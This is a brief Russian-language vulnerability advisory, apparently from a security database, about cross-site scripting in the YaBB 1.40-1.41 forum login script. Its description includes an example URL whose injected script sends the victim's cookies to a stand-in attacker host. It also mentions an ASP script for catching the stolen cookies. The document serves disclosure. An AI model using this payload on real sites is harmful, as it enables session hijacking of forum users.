Межсайтовый скриптинг в YaBB
| Дата публикации: | 21.10.2002 |
| Дата изменения: | 17.10.2006 |
| Всего просмотров: | 1896 |
| Опасность: | Низкая |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Межсайтовый скриптинг |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | YaBB 1.x |
| Описание: | YaBB (Yet Another Bulletin Board) – BBS система от http://www.yabb.org/. Межсайтовый скрптинг обнаружен в сценарии входа в систему. Атакующий может создать злонамеренную ссылку, содержащую произвольный код сценария, который будет выполнен в браузере пользователя, в контексте уязвимого сайта. Пример: http://example.com/forums/index.php? board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script> window.location.href(%22http://www.attackersite.example.com/hack.asp?%22% 2Bdocument.cookie)</script>уязвимость обнаружена в YaBB 1.40-1.41 |
| Ссылки: |
Пример ASP сценария, который используется для перехвата куки New Vulnerability on YaBB 1.4.0 and YaBB 1.4.1 forums |